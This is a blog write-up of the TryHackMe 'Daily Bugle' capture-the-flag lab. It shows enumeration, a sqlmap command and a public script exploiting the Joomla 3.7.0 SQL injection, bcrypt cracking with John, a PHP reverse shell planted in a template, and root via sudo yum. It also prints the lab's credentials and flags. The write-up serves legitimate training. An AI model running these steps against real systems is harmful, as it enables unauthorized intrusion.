Open in app

Sign in

Write

Sign in

TryHackMe Daily Bugle Writeup

Shivam Taneja
5 min readNov 7, 2022

Daily Bugle WalkThrough

Daily Bugle is a CTF Machine that is kinda hard and involves many methods in order to solve the challenge, so let’s start by accessing it from here

As always, let’s start with Nmap to enumerate Daily Bugle Machine and see which services are available on our target.

nmap -sV -sC Machine_IP

After the scan finishes, you should get something similar to the following

Starting Nmap 7.80 ( https://nmap.org ) at 2022–10–12 08:55 EDT

Nmap scan report for 10.10.226.51

Host is up (0.27s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

| ssh-hostkey:

| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)

| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)

|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)

| http-robots.txt: 15 disallowed entries

| /joomla/administrator/ /administrator/ /bin/ /cache/

| /cli/ /components/ /includes/ /installation/ /language/

|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 112.63 seconds

From the results we can know the following:

  • SSH service running with asymmetric key authentication
  • HTTP service is running, so we can access it from the browser
  • we have Robots.txt file along with multiple directories discovered
  • and finally the CMS used in joomla

let’s start by opening the browser to the server, and from the home page, we can get the answer of the first question

Access the web server, who robbed the bank?

spiderman

there’s nothing more on the home page, so let’s check the source code , there’s nothing important there too.

Let’s check the robots.txt file, there’s nothing there other than the admin login page.

before we start doing brute forcing, the next question is about joomla version, which you can get by installing a tool called JoomScan that helps to enumerate the joomla CMS.

first you need to install it with

sudo apt-get install JoomScan

and then we run the tool with the following command

joomscan -u http://Machine_IP

from the results of the scan, we will get the next answer.

What is the Joomla version?

3.7.0

until the tool finishes scanning (nothing important will show that we don’t know about yet), let’s search in exploit-db if there is any known vulnerability that we can exploit to get inside the CMS.

searchsploit joomla 3.7.0

and what do you know, we have two vulnerabilities, one of them is SQL injection

https://www.exploit-db.com/exploits/42033

Let’s open the link above, we can see that the CMS is vulnerable by using a simple SQLmap command to the home page,you can use this command but it will take so much time.

sqlmap -u “http://Machine_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" — risk=3 — level=5 — random-agent — dbs -p list[fullordering]

There’s a hint that we should use a python script, so i searched online for Joomla 3.7.0 SQL injection written in python and i found the following script on github.

so let’s get the script

https://github.com/NinjaJc01/joomblah-3

and then let’s run it against our target, you should get something similar to this

[-] Fetching CSRF token

[-] Testing SQLi

(‘ — Found table:’, ‘fb9j5_users’)

(‘ — Extracting users from’, ‘fb9j5_users’)

(‘ [$] Found user’, [‘811’, ‘Super User’, ‘jonah’, ‘jonah@tryhackme.com’, ‘$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm’, ‘’, ‘’])

(‘ — Extracting sessions from’, ‘fb9j5_session’)

so we have a user along with a password, let’s try to crack the password (Bcrypt hash) with John The Ripper.

john — format=bcrypt — wordlist=/usr/share/wordlists/rockyou.txt password_joomla

and we would get the next answer

What is Jonah’s cracked password?

spiderman123

now let’s login to joomla CMS

after we login, we need to upload a reverse shell so we can control the Daily Bugle Machine and get the flag.

we know that Joomla runs on PHP, so we need a PHP reverse Shell , but when you upload it, joomla won’t allow you, so first we need to allow PHP file upload.

You can allow that by going to Content->Media->options and you should see “Legal Extension” Field, you can also disable “restrict uploads” just in case

But, it didn’t work, you can try to add “php” to “Legal image extensions” , “Legal MIME Types” but it didn’t work.

Another way is to copy the code inside the template that runs PHP, so if you go to Extensions->Templates->Templates you should get the following

if you enlarge the images, you can see that the second one is the one being used, so if we replace the index.php file (the one accessed by default for the home page) then refreshed the page, you should get the reverse shell.

after we get access, let’s head to the home folder

cd home

we can see that there’s a user called jjameson, but we don’t have permission to access it, so it’s time for privilege escalation.

If we checked with which “sudo” permissions we have by using

sudo -l

you can see that we have none, so as always, let’s check for the second place which is the crontab.

There’s nothing there, and we don’t have permission to edit the crontab neither

-rw-r — r — . 1 root root 451 Jun 9 2014 /etc/crontab

Since there’s nothing, let’s check the web server files, maybe we have something in configurations

cd /var/www/html

and let’s check what files we have

LICENSE.txt

README.txt

administrator

bin

cache

cli

components

configuration.php

htaccess.txt

images

includes

index.php

language

layouts

libraries

media

modules

plugins

robots.txt

templates

tmp

web.config.txt

let’s check the configuration file.

You should get something similar to this

public $display_offline_message = ‘1’;

public $offline_image = ‘’;

public $sitename = ‘The Daily Bugle’;

public $editor = ‘tinymce’;

public $captcha = ‘0’;

public $list_limit = ‘20’;

public $access = ‘1’;

public $debug = ‘0’;

public $debug_lang = ‘0’;

public $dbtype = ‘mysqli’;

public $host = ‘localhost’;

public $user = ‘root’;

public $password = ‘nv5uz9r3ZEDzVjNu’;

public $db = ‘joomla’;

public $dbprefix = ‘fb9j5_’;

public $live_site = ‘’;

public $secret = ‘UAMBRWzHO3oFPmVC’;

public $gzip = ‘0’;

public $error_reporting = ‘default’;

so we have a password that might work, i tried the password on mysql and root users but it didn’t work, then i tried it on jjameson and voila !

su jjameson

and we can get our flag from here by going to the user home files

What is the user flag?

27a260fe3cba712cfdedb1c86d80442e

now, it’s time to get root privileges, let’s see which sudo commands we can run, by running sudo -l

/usr/bin/yum

so let’s see if we can escalate our privileges with this command by checking gtfobins

in order to escalate our privileges with Yum, we have two methods, either create a package and install it, or method b by doing a custom plugin.

I’ll go with method B, after it works fine, you will have root user, you can check by running whoami

What is the root flag?

eec3d53292b1821868266858d7fa6f79

and finally, we finished Daily Bugle machine.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Tryhackme
Shivamtaneja
Linux
Hacking
Coding
Shivam Taneja
Shivam Taneja

Written by Shivam Taneja

28 Followers
17 Following

IT Security Consultant, Researcher, Penetration Tester & Hacker.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams